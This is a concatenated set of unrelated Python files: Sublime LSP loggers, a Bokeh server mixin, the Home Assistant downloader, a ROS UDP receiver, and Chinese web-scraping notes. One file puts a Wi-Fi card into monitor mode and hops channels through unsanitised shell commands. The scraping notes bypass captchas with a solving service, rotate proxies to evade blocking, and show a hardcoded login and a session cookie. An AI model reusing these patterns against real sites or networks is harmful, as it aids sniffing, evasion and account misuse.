walker = DiagnosticsWalker([walk])
walker.walk(self._diagnostics_by_file_async())
# The actual presentation of the phantom needs to happen on the UI thread, otherwise you'll see a phantom
# disappearing and then immediately after a phantom appearing. This is jarring. So run blocking.
sublime.set_timeout(lambda: self._set_diagnostic_phantom(self._cursor.value))
def _set_diagnostic_phantom(self, file_diagnostic: Optional[Tuple[str, Diagnostic]]) -> None:
self._clear_diagnostic_phantom()
if file_diagnostic:
file_path, diagnostic = file_diagnostic
view = self._window.find_open_file(file_path)
if view:
phantom_set = sublime.PhantomSet(view, self.DIAGNOSTIC_PHANTOM_KEY)
base_dir = self.get_project_path(file_path)
phantom = diagnostic_to_phantom(view, diagnostic, base_dir, self._navigate_diagnostic_phantom)
phantom_set.update([phantom])
self._window.focus_view(view)
view.show_at_center(phantom.region)
self._diagnostic_phantom_set = phantom_set
has_phantom = view.settings().get(self.DIAGNOSTIC_PHANTOM_KEY)
if not has_phantom:
view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, True)
else:
debug("no view for file", file_path)
else:
if self._diagnostic_phantom_set:
view = self._diagnostic_phantom_set.view
has_phantom = view.settings().get(self.DIAGNOSTIC_PHANTOM_KEY)
if not has_phantom:
view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, False)
def _navigate_diagnostic_phantom(self, href: str) -> None:
if href == "hide":
self._clear_diagnostic_phantom()
elif href == "next":
self._window.run_command("lsp_next_diagnostic")
elif href == "previous":
self._window.run_command("lsp_previous_diagnostic")
elif href.startswith("location:"):
self._window.open_file(href[len("location:"):], sublime.ENCODED_POSITION)
def _clear_diagnostic_phantom(self) -> None:
if self._diagnostic_phantom_set:
self._diagnostic_phantom_set.view.settings().set(self.DIAGNOSTIC_PHANTOM_KEY, False)
self._diagnostic_phantom_set.update([])
class WindowRegistry(object):
def __init__(self, configs: ConfigManager) -> None:
self._windows = {} # type: Dict[int, WindowManager]
self._configs = configs
def lookup(self, window: sublime.Window) -> WindowManager:
if window.id() in self._windows:
return self._windows[window.id()]
workspace = ProjectFolders(window)
window_configs = self._configs.for_window(window)
state = WindowManager(window=window, workspace=workspace, configs=window_configs)
self._windows[window.id()] = state
return state
def discard(self, window: sublime.Window) -> None:
self._windows.pop(window.id(), None)
class PanelLogger(Logger):
def __init__(self, manager: WindowManager, server_name: str) -> None:
self._manager = ref(manager)
self._server_name = server_name
def stderr_message(self, message: str) -> None:
"""
Not handled here as stderr messages are handled by WindowManager regardless
if this logger is enabled.
"""
pass
def log(self, message: str, params: Any) -> None:
def run_on_async_worker_thread() -> None:
nonlocal message
params_str = str(params)
if 0 < userprefs().log_max_size <= len(params_str):
params_str = '<params with {} characters>'.format(len(params_str))
message = "{}: {}".format(message, params_str)
manager = self._manager()
if manager is not None:
manager.handle_server_message(":", message)
sublime.set_timeout_async(run_on_async_worker_thread)
def outgoing_response(self, request_id: Any, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_response(">>>", request_id), params)
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
if not userprefs().log_server:
return
self.log(self._format_response("~~>", request_id), error.to_lsp())
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("-->", method, request_id), params)
def outgoing_notification(self, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_notification(" ->", method), params)
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
if not userprefs().log_server:
return
direction = "<~~" if is_error else "<<<"
self.log(self._format_response(direction, request_id), params)
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
if not userprefs().log_server:
return
self.log(self._format_request("<--", method, request_id), params)
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
if not userprefs().log_server:
return
direction = "<? " if unhandled else "<- "
self.log(self._format_notification(direction, method), params)
def _format_response(self, direction: str, request_id: Any) -> str:
return "{} {} {}".format(direction, self._server_name, request_id)
def _format_request(self, direction: str, method: str, request_id: Any) -> str:
return "{} {} {}({})".format(direction, self._server_name, method, request_id)
def _format_notification(self, direction: str, method: str) -> str:
return "{} {} {}".format(direction, self._server_name, method)
class RemoteLogger(Logger):
PORT = 9981
DIRECTION_OUTGOING = 1
DIRECTION_INCOMING = 2
_ws_server = None # type: Optional[WebsocketServer]
_ws_server_thread = None # type: Optional[threading.Thread]
_last_id = 0
def __init__(self, manager: WindowManager, server_name: str) -> None:
RemoteLogger._last_id += 1
self._server_name = '{} ({})'.format(server_name, RemoteLogger._last_id)
if not RemoteLogger._ws_server:
try:
RemoteLogger._ws_server = WebsocketServer(self.PORT)
RemoteLogger._ws_server.set_fn_new_client(self._on_new_client)
RemoteLogger._ws_server.set_fn_client_left(self._on_client_left)
RemoteLogger._ws_server.set_fn_message_received(self._on_message_received)
self._start_server()
except OSError as ex:
if ex.errno == 48: # Address already in use
debug('WebsocketServer not started - address already in use')
RemoteLogger._ws_server = None
else:
raise ex
def _start_server(self) -> None:
def start_async() -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.run_forever()
RemoteLogger._ws_server_thread = threading.Thread(target=start_async)
RemoteLogger._ws_server_thread.start()
def _stop_server(self) -> None:
if RemoteLogger._ws_server:
RemoteLogger._ws_server.shutdown()
RemoteLogger._ws_server = None
if RemoteLogger._ws_server_thread:
RemoteLogger._ws_server_thread.join()
RemoteLogger._ws_server_thread = None
def _on_new_client(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client connecting (after handshake)."""
debug("New client connected and was given id %d" % client['id'])
# server.send_message_to_all("Hey all, a new client has joined us")
def _on_client_left(self, client: Dict, server: WebsocketServer) -> None:
"""Called for every client disconnecting."""
debug("Client(%d) disconnected" % client['id'])
def _on_message_received(self, client: Dict, server: WebsocketServer, message: str) -> None:
"""Called when a client sends a message."""
debug("Client(%d) said: %s" % (client['id'], message))
def stderr_message(self, message: str) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': 'stderr',
'params': message,
'isError': True,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_request(self, request_id: int, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_response(self, request_id: int, params: Any, is_error: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_INCOMING,
'isError': is_error,
})
def incoming_request(self, request_id: Any, method: str, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def outgoing_response(self, request_id: Any, params: Any) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'time': round(time() * 1000),
'params': params,
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_error_response(self, request_id: Any, error: Error) -> None:
self._broadcast_json({
'server': self._server_name,
'id': request_id,
'isError': True,
'params': error.to_lsp(),
'time': round(time() * 1000),
'direction': self.DIRECTION_OUTGOING,
})
def outgoing_notification(self, method: str, params: Any) -> None:
trimmed_params = deepcopy(params)
if method.endswith("didOpen"):
if isinstance(params, dict) and "textDocument" in params:
trimmed_params['textDocument']['text'] = '[trimmed]'
elif method.endswith("didChange"):
content_changes = params.get("contentChanges")
if content_changes and "range" not in content_changes[0]:
pass
elif method.endswith("didSave"):
if isinstance(params, dict) and "text" in params:
trimmed_params['text'] = '[trimmed]'
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'method': method,
'params': trimmed_params,
'direction': self.DIRECTION_OUTGOING,
})
def incoming_notification(self, method: str, params: Any, unhandled: bool) -> None:
self._broadcast_json({
'server': self._server_name,
'time': round(time() * 1000),
'error': 'Unhandled notification!' if unhandled else None,
'method': method,
'params': params,
'direction': self.DIRECTION_INCOMING,
})
def _broadcast_json(self, data: Dict[str, Any]) -> None:
if RemoteLogger._ws_server:
json_data = json.dumps(data, sort_keys=True, check_circular=False, separators=(',', ':'))
RemoteLogger._ws_server.send_message_to_all(json_data)
class RouterLogger(Logger):
def __init__(self) -> None:
self._loggers = [] # type: List[Logger]
def append(self, logger: Logger) -> None:
self._loggers.append(logger)
def stderr_message(self, *args: Any, **kwargs: Any) -> None:
self._foreach("stderr_message", *args, **kwargs)
def outgoing_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_response", *args, **kwargs)
def outgoing_error_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_error_response", *args, **kwargs)
def outgoing_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_request", *args, **kwargs)
def outgoing_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("outgoing_notification", *args, **kwargs)
def incoming_response(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_response", *args, **kwargs)
def incoming_request(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_request", *args, **kwargs)
def incoming_notification(self, *args: Any, **kwargs: Any) -> None:
self._foreach("incoming_notification", *args, **kwargs)
def _foreach(self, method: str, *args: Any, **kwargs: Any) -> None:
for logger in self._loggers:
getattr(logger, method)(*args, **kwargs)
|
spade_bokeh.py
|
# -*- coding: utf-8 -*-
import asyncio
from threading import Thread
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.server.server import BaseServer
from bokeh.server.tornado import BokehTornado
from bokeh.server.util import bind_sockets
from bokeh.embed import server_document
class BokekServer(object):
def __init__(self, agent):
self.hostname = None
self.port = None
self.agent = agent
self.thread = Thread(target=self.bokeh_worker)
self.server = None
self.is_running = False
self.apps = {}
def start(self, hostname="localhost", port=5006):
"""
Starts the bokeh server.
Args:
hostname (str): hostname of the server. Must be the same where the agent is running. Defaults to "localhost"
port (int): port of the server. Defaults to 5006.
"""
self.hostname = hostname
self.port = port
self.thread.start()
self.is_running = True
def stop(self):
"""
Stops the Bokeh server.
"""
if self.server:
self.server.stop()
self.is_running = False
def bokeh_worker(self):
asyncio.set_event_loop(asyncio.new_event_loop())
sockets, port = bind_sockets(self.hostname, self.port)
extra_websocket_origins = ["{}:{}".format(self.hostname, self.port),
"{}:{}".format(self.hostname, self.agent.web.port)]
bokeh_tornado = BokehTornado(self.apps, extra_websocket_origins=extra_websocket_origins)
bokeh_http = HTTPServer(bokeh_tornado)
bokeh_http.add_sockets(sockets)
self.server = BaseServer(IOLoop.current(), bokeh_tornado, bokeh_http)
self.server.start()
self.server.io_loop.start()
def get_plot_script(self, path):
"""
Returns the necessary javascript to render a plot
Args:
path (str): the path with which the plot was registered in the server.
Returns:
A string with the javascript code to render the plot.
"""
return server_document("http://{hostname}:{port}{path}".format(hostname=self.hostname,
port=self.port,
path=path))
def add_plot(self, path, func):
"""
Registers a new plot in the bokeh server.
Args:
path: path where the plot will respond to queries
func: the function that renders the plot.
"""
self.apps[path] = Application(FunctionHandler(func))
class BokehServerMixin(object):
"""
This is the Mixin to inherit from when you create your agent.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bokeh_server = BokekServer(agent=self)
|
__init__.py
|
"""Support for functionality to download files."""
import logging
import os
import re
import threading
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.util import sanitize_filename
_LOGGER = logging.getLogger(__name__)
ATTR_FILENAME = "filename"
ATTR_SUBDIR = "subdir"
ATTR_URL = "url"
ATTR_OVERWRITE = "overwrite"
CONF_DOWNLOAD_DIR = "download_dir"
DOMAIN = "downloader"
DOWNLOAD_FAILED_EVENT = "download_failed"
DOWNLOAD_COMPLETED_EVENT = "download_completed"
SERVICE_DOWNLOAD_FILE = "download_file"
SERVICE_DOWNLOAD_FILE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_URL): cv.url,
vol.Optional(ATTR_SUBDIR): cv.string,
vol.Optional(ATTR_FILENAME): cv.string,
vol.Optional(ATTR_OVERWRITE, default=False): cv.boolean,
}
)
CONFIG_SCHEMA = vol.Schema(
{DOMAIN: vol.Schema({vol.Required(CONF_DOWNLOAD_DIR): cv.string})},
extra=vol.ALLOW_EXTRA,
)
def setup(hass, config):
"""Listen for download events to download files."""
download_path = config[DOMAIN][CONF_DOWNLOAD_DIR]
# If path is relative, we assume relative to HASS config dir
if not os.path.isabs(download_path):
download_path = hass.config.path(download_path)
if not os.path.isdir(download_path):
_LOGGER.error(
"Download path %s does not exist. File Downloader not active", download_path
)
return False
def download_file(service):
"""Start thread to download file specified in the URL."""
def do_download():
"""Download the file."""
try:
url = service.data[ATTR_URL]
subdir = service.data.get(ATTR_SUBDIR)
filename = service.data.get(ATTR_FILENAME)
overwrite = service.data.get(ATTR_OVERWRITE)
if subdir:
subdir = sanitize_filename(subdir)
final_path = None
req = requests.get(url, stream=True, timeout=10)
if req.status_code != 200:
_LOGGER.warning(
"downloading '%s' failed, status_code=%d", url, req.status_code
)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_FAILED_EVENT}",
{"url": url, "filename": filename},
)
else:
if filename is None and "content-disposition" in req.headers:
match = re.findall(
r"filename=(\S+)", req.headers["content-disposition"]
)
if match:
filename = match[0].strip("'\" ")
if not filename:
filename = os.path.basename(url).strip()
if not filename:
filename = "ha_download"
# Remove stuff to ruin paths
filename = sanitize_filename(filename)
# Do we want to download to subdir, create if needed
if subdir:
subdir_path = os.path.join(download_path, subdir)
# Ensure subdir exist
if not os.path.isdir(subdir_path):
os.makedirs(subdir_path)
final_path = os.path.join(subdir_path, filename)
else:
final_path = os.path.join(download_path, filename)
path, ext = os.path.splitext(final_path)
# If file exist append a number.
# We test filename, filename_2..
if not overwrite:
tries = 1
final_path = path + ext
while os.path.isfile(final_path):
tries += 1
final_path = f"{path}_{tries}.{ext}"
_LOGGER.debug("%s -> %s", url, final_path)
with open(final_path, "wb") as fil:
for chunk in req.iter_content(1024):
fil.write(chunk)
_LOGGER.debug("Downloading of %s done", url)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_COMPLETED_EVENT}",
{"url": url, "filename": filename},
)
except requests.exceptions.ConnectionError:
_LOGGER.exception("ConnectionError occurred for %s", url)
hass.bus.fire(
f"{DOMAIN}_{DOWNLOAD_FAILED_EVENT}",
{"url": url, "filename": filename},
)
# Remove file if we started downloading but failed
if final_path and os.path.isfile(final_path):
os.remove(final_path)
threading.Thread(target=do_download).start()
hass.services.register(
DOMAIN,
SERVICE_DOWNLOAD_FILE,
download_file,
schema=SERVICE_DOWNLOAD_FILE_SCHEMA,
)
return True
|
Interface.py
|
from os import system
from time import sleep
import threading
class Interface:
def __init__(self, interface):
self.name = interface
self.hopperRunning = False
self.hopperThread = None
def enableMonitor(self):
system("ifconfig {0} down && iwconfig {0} mode monitor && ifconfig {0} up".format(self.name))
print("[+] Enabled monitor mode")
def disableMonitor(self):
system("ifconfig {0} down && iwconfig {0} mode managed && ifconfig {0} up".format(self.name))
print("[+] Disabled monitor mode")
def startChannelHopper(self):
def channelHopper():
while self.hopperRunning:
for channel in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]:
sleep(1)
system("iw dev {0} set channel {1}".format(self.name, channel))
self.hopperThread = threading.Thread(target=channelHopper)
self.hopperRunning = True
self.hopperThread.start()
print("[+] Started channel hopper thread")
def stopChannelHopper(self):
if self.hopperThread != None:
self.hopperRunning = False
print("\r[-] Stopping channel hopper thread ...")
self.hopperThread.join()
print("[+] Stopped channel hopper thread")
|
thread_example.py
|
# -*- codiing:utf-8 -*-
"""
thread example
"""
__author__="aaron.qiu"
import time, threading
# 新线程执行的代码:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
if __name__=='__main__':
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
|
receiver.py
|
#!/usr/bin/env python
from sqlite3 import DatabaseError
import rospy
from geometry_msgs.msg import PoseStamped
from nav_msgs.msg import Path
import threading
import socket
import time
class Receiver(object):
def __init__(self, addr='127.0.0.1', port=23334):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addr = addr
self.port = port
self.sock.settimeout(1.0)
self.sock.bind((self.addr, self.port))
self.thread = threading.Thread(target=self.receive_data)
self.thread.start()
self.timeout = False
# publisher
self.pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)
self.sub = rospy.Subscriber("/global_path_planning", Path, self.pathCallback)
rospy.init_node('joy_receiver')
rospy.spin()
def receive_data(self):
while True:
try:
data, _ = self.sock.recvfrom(4096)
splitted = data.decode("utf-8").split(',')
goal_x, goal_y = splitted[0], splitted[1]
robot_x, robot_y = -9999, -9999
if len(splitted) == 4:
robot_x, robot_y = splitted[2], splitted[3]
goal = PoseStamped()
goal.pose.position.x = int(goal_x)
goal.pose.position.y = int(goal_y)
goal.pose.orientation.x = int(robot_x)
goal.pose.orientation.y = int(robot_y)
self.pub.publish(goal)
self.timeout = False
except socket.timeout:
self.timeout = True
time.sleep(0.01)
def pathCallback(self, msg):
path_str = ''
for pose in msg.poses:
# print(pose.pose.position.x, pose.pose.position.y)
path_str += str(pose.pose.position.x) + ',' + str(pose.pose.position.y) + ';'
path_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
path_sock.sendto(bytes(path_str, 'ascii'), ('127.0.0.1', 23333))
if __name__ == '__main__':
try:
Receiver()
except rospy.ROSInterruptException:
pass
|
DayDayUp.py
|
# 1.retrying模块使用
~~~python
import requests
from retrying import retry
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
@retry(stop_max_attempt_number=3)
def _parse_url(url):
print("*"*100)
response = requests.get(url, headers=headers, timeout=3)
return response.content.decode("utf-8")
def parse_url(url):
try:
html_str = _parse_url(url)
except:
html_str = None
return html_str
if __name__ == '__main__':
url = "http://www.baidu.com"
content = parse_url(url)
with open("content.html", "wb") as f:
f.write(content.encode("utf-8"))
~~~
# 2.cookie字典推导式
~~~python
Cookie= "BAIDUID=2372C5B0CA576383B4BB27FAD889D1F1:FG=1; " \
"BIDUPSID=2372C5B0CA576383B4BB27FAD889D1F1; " \
"PSTM=1540220135; BD_UPN=12314353; " \
"BDUSS=BFMGNqYXFNMkJnVHRIblctcGhxbllKMmRtbkhDdk1IUVRy" \
"bnFvaURrTFZtUUJjQVFBQUFBJCQAAAAAAAAAAAEAAABh-XRYYWlyY2" \
"92AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAANUM2VvVDNlbbV; locale=zh; BD_HOME=1; " \
"H_PS_PSSID=27541_1464_21104_22157"
cookie_dict = {i.split("=")[0]:i.split("=")[1] for i in Cookie.split("; ")}
print(cookie_dict)
===========================================================================
login——douban
# 获取cookie
cookies = {i["name"]:i["value"] for i in driver.get_cookies()}
print(cookies)
~~~
# 3. 保存图片到本地 urlretrieve
~~~python
from urllib import request
def urlretrieve(url, filename=None, reporthook=None, data=None):
request.urlretrieve(img_url, "images/" + img_name) # 通过图片地址,保存图片到本地
~~~
# 4. 代理proxy的使用
* 准备一堆ip,组成ip池,随机选择一个ip使用
* 如何随机选择代理ip
* 按照使用的次数进行排序
* 选择使用次数少的ip,随机选择
* 检查ip可用性
* 使用requests超时参数
* 在线代理ip质量检测的网站
~~~python
import requests
proxies = {
"http": "http://219.141.153.12:8080"
}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
}
response = requests.get("https://www.taobao.com", proxies=proxies, headers=headers)
print(response.status_code)
~~~
# 5.requests.utils.unqoute()
url解码
# 6. zip函数,map函数
~~~python
a = [1, 2]
b = [3, 4]
c = zip(a,b)
c = [
(1, 3),
(2, 4)
]
poems_list = []
for value in zip(title_list, dynasty_list, author_list, contents):
title, dynasty, author, content = value
items = {
"title": title,
"dynasty": dynasty,
"author": author,
"content": content
}
poems_list.append(items)
return poems_list
~~~
~~~python
# 1.有一个字典对象,d = {'a':1,'b':2},请用尽量简洁的代码将d转换成{1: 'a', 2: 'b'}
dict(zip(d.values(), d.keys()))
~~~
~~~python
#2、匿名函数,一般用来给 filter,sorted,map,reduce 这样的函数式编程服务;
filter(lambda x: x % 3 == 0, [1, 2, 3]) 结果是 [3]
sorted([1, 2, 3, 4, 5, 6, 7, 8, 9], key=lambda x: abs(5-x)) 结果是[5, 4, 6, 3, 7, 2, 8, 1, 9]
map(lambda x: x+1, [1, 2, 3]) 结果是[2,3,4]
reduce(lambda a, b: '{}, {}'.format(a, b), [1, 2, 3, 4, 5, 6, 7, 8, 9]) 结果是'1, 2, 3, 4, 5, 6, 7, 8, 9'
~~~
~~~python
info_list = dl.xpath(".//p[@class='tel_shop']/text()").getall()
info_list = list(map(lambda x: re.sub(r"\s", "", x), info_list))
# print(info_list) # ['4室2厅', '133.84㎡', '高层(共16层)', '南北向', '2003年建', '']
~~~
# 7. splitext 按照文件扩展名切割
~~~python
import os,re
img_url = img.get("data-original")
alt = img.get("alt")
alt = re.sub(r"[\??。\.,,!!\*]", "", alt)
# 获取图片后缀('https://ws4.sinaimg.cn/bmiddle/9150e4e5gy1fxd0c5j6flg204m04o4bk', '.gif')
suffix = os.path.splitext(img_url)[1] # 得到后缀.gif
img_name = alt + suffix
~~~
# 8.多线程、协程池爬虫
多线程
~~~python
import json
import random
import threading
import requests
from queue import Queue # 线程队列
# from multiprocessing import JoinableQueue as Queue # 进程队列 后续操作跟线程一样
from fake_useragent import UserAgent
from lxml import etree
import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='./info.log',
filemode='a'
)
class DianyingtiantangSpider(object):
def __init__(self):
self.start_url = "https://www.dy2018.com/html/gndy/dyzz/index.html"
self.url_temp = "https://www.dy2018.com/html/gndy/dyzz/index_{}.html"
self.ua = UserAgent().random
self.headers = {
# "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
# "user-agent": random.choice(self.ua)
}
self.url_queue = Queue()
self.html_queue = Queue()
self.detail_page_url_queue = Queue()
self.movie_queue = Queue()
def get_url_list(self): # 构造url列表
self.url_queue.put(self.start_url)
for i in range(2, 300):
self.url_queue.put(self.url_temp.format(i))
def parse_url(self): # 发送请求,获取响应
while True:
url = self.url_queue.get()
self.headers['user-agent'] = self.ua
response = requests.get(url, headers=self.headers)
# 电影天堂网站编码格式为charset=gb2312,查看网页源代码
self.html_queue.put(response.content.decode("gbk"))
self.url_queue.task_done()
def get_content_list(self): # 提取电影详情页的url
while True:
html_str = self.html_queue.get()
html = etree.HTML(html_str)
detail_url_list = html.xpath("//table[@class='tbspan']//a/@href")
content_list = []
for detail_url_temp in detail_url_list:
detail_url = "https://www.dy2018.com" + detail_url_temp
content_list.append(detail_url)
self.detail_page_url_queue.put(content_list)
self.html_queue.task_done()
def parse_detail_url(self): # 请求详情页数据
while True:
detail_page_url_list = self.detail_page_url_queue.get()
pass
self.movie_queue.put(movie_list)
self.detail_page_url_queue.task_done()
def save_movies(self):
while True:
movies = self.movie_queue.get()
with open("./电影天堂.json", "a", encoding="utf-8") as f:
for movie in movies:
f.write(json.dumps(movie, ensure_ascii=False) + "\n")
self.movie_queue.task_done()
def run(self): # 实现主要逻辑
thread_list = []
# 1.构造url列表
t1 = threading.Thread(target=self.get_url_list)
thread_list.append(t1)
# 2.遍历列表,发送请求,获取响应
for i in range(5):
t2 = threading.Thread(target=self.parse_url)
thread_list.append(t2)
# 3.提取数据
t3 = threading.Thread(target=self.get_content_list)
thread_list.append(t3)
# 4.请求所有详情页数据
for i in range(5):
t4 = threading.Thread(target=self.parse_detail_url)
thread_list.append(t4)
# 5.保存数据
for i in range(2):
t5 = threading.Thread(target=self.save_movies)
thread_list.append(t5)
# 把子线程设置为守护线程,主线程结束,子线程结束
# 开启线程
for t in thread_list:
t.setDaemon(True)
t.start()
# 让主线程等待阻塞,等待队列的任务完成之后再完成
# 队列阻塞,队列的计数器为0的时候,解阻塞
for q in [self.url_queue, self.html_queue, self.detail_page_url_queue, self.movie_queue]:
q.join()
print("主线程结束") # 多线程实现:高内聚,低耦合
if __name__ == '__main__':
dianyingtiantangspider = DianyingtiantangSpider()
dianyingtiantangspider.run()
~~~
协程池
~~~python
import time
from gevent import monkey
from gevent.pool import Pool
from lxml import etree
monkey.patch_all()
import requests
from queue import Queue
class QiushiSpider(object):
def __init__(self):
self.temp_url = 'https://www.qiushibaike.com/hot/page/{}'
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
}
self.url_queue = Queue()
self.pool = Pool()
self.response_mum = 0
self.request_mum = 0
self.count = 0
def run(self):
start_time = time.time()
self.async_start()
end_time = time.time()
print("耗时:{}".format((end_time - start_time)))
print("总数:{}".format(self.count))
def async_start(self):
"""异步请求"""
self.get_url()
# 执行异步请求
for i in range(5):
self.pool.apply_async(self.start, callback=self._callback)
while True:
time.sleep(0.001)
if self.response_mum >= self.request_mum:
break
def get_url(self):
"""获取url,保存到队列"""
for i in range(1, 14):
url = self.temp_url.format(i)
self.url_queue.put(url)
self.request_mum += 1
def start(self):
# 1.获取url
url = self.url_queue.get()
print(url)
data = self.send_request(url)
self.analysis_data(data)
# 保存
def _callback(self, item):
"""回调函数,必须传item形参"""
self.pool.apply_async(self.start, callback=self._callback)
def send_request(self, url):
"""发送请求"""
response = requests.get(url, headers=self.headers)
print(response.url)
data = response.content
self.response_mum += 1
return data
def analysis_data(self, data):
"""解析数据"""
html_data = etree.HTML(data)
# 1.获取25个帖子
div_list = html_data.xpath('//div[@id="content-left"]/div')
# 2. 遍历每一个帖子 取出 昵称
for div in div_list:
nick_name = div.xpath('.//h2/text()')[0]
print(nick_name.strip())
self.count += 1
if __name__ == '__main__':
qiushi = QiushiSpider()
qiushi.run()
~~~
~~~
# 遍历列表得到 索引,内容
for index, info in enumerate(infos)
~~~
13_face_spider_v2.py
# 9. selenium
~~~python
from selenium import webdriver
import time
import requests
from dama import identify
# 实例化driver
driver = webdriver.Chrome()
driver.get("https://www.douban.com/")
driver.find_element_by_id("form_email").send_keys("aircov@163.com")
driver.find_element_by_id("form_password").send_keys("douban123456")
# 识别验证码
try:
captcha_image_url = driver.find_element_by_id("captcha_image").get_attribute("src") # 验证码的地址
except:
# 登录
driver.find_element_by_class_name("bn-submit").click()
else:
captcha_content = requests.get(captcha_image_url).content # 请求验证码地址 获取响应
captcha_code = identify(captcha_content) # 调用打码平台
print("验证码的识别结果为:%s" % captcha_code)
# 输入验证码
driver.find_element_by_id("captcha_field").send_keys(captcha_code)
# 登录
driver.find_element_by_class_name("bn-submit").click()
# 获取cookie
cookies = {i["name"]:i["value"] for i in driver.get_cookies()}
print(cookies)
time.sleep(5)
# driver.quit()
~~~
selenium 爬取拉勾网
```
新窗口打开页面:self.driver.execute_script("window.open('%s')" % link)
切换到新标签页中:self.driver.switch_to.window(self.driver.window_handles[1])
关闭当前这个详情页:self.driver.close()
继续切换回职位列表页:self.driver.switch_to.window(self.driver.window_handles[0])
```
js代码 滚动到最后
~~~python
code_js = "window.scrollTo(0,document.body.scrollHeight)"
self.driver.execute_script(code_js)
~~~
# 10. scrapy 基本使用
scrapy genspider -t crawl spider_name allow_domain
~~~python
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
import re
class CfSpider(CrawlSpider):
name = 'cf'
allowed_domains = ['circ.gov.cn']
start_urls = ['http://bxjg.circ.gov.cn/web/site0/tab5240/module14430/page1.htm']
# 定义提取url地址规则
rules = (
# LinkExtractor 链接提取器,提取url地址
# callback,提取出来的url地址的response会交给callback处理
# follow 当前url地址的响应是否重新经过rules提取url地址,
Rule(LinkExtractor(allow=r'/web/site0/tab5240/info\d+\.htm'), callback='parse_item', follow=False),
Rule(LinkExtractor(allow=r'/web/site0/tab5240/module14430/page\d+\.htm'), follow=True),
)
# parse函数有特殊功能,请求链接提取器的url,不能定义
def parse_item(self, response):
item = {}
item["title"] = re.findall(r"<!--TitleStart-->(.*?)<!--TitleEnd-->", response.body.decode("utf-8"))[0]
item["publish_date"] = re.findall(r"发布时间:(20\d{2}-\d{2}-\d{2})", response.body.decode("utf-8"))[0]
print(item)
# yield scrapy.Request(
# url,
# callback=self.parse_detail,
# meta={"item":item}
# )
#
# def parse_detail(self,response):
# item = response.meta("item")
# item["price"] = "///"
# yield item
~~~
spider.py
~~~python
# -*- coding: utf-8 -*-
import re
import scrapy
from scrapy_redis.spiders import RedisSpider
from scrapy import log
from fangtianxia.items import NewHouseItem, ESFHouseItem, RentHouseItem
class SfwSpider(RedisSpider):
name = 'sfw'
allowed_domains = ['fang.com']
# start_urls = ['https://www.fang.com/SoufunFamily.htm']
redis_key = 'fangtianxia' # lpush fangtianxia https://www.fang.com/SoufunFamily.htm
def parse(self, response):
tr_list = response.xpath("//div[@class='outCont']//tr")
province = None
for tr in tr_list:
# 没有class属性的td
td_list = tr.xpath("./td[not(@class)]")
province_td = td_list[0]
province_text = province_td.xpath(".//text()").get()
province_text = re.sub(r"\s", "", province_text)
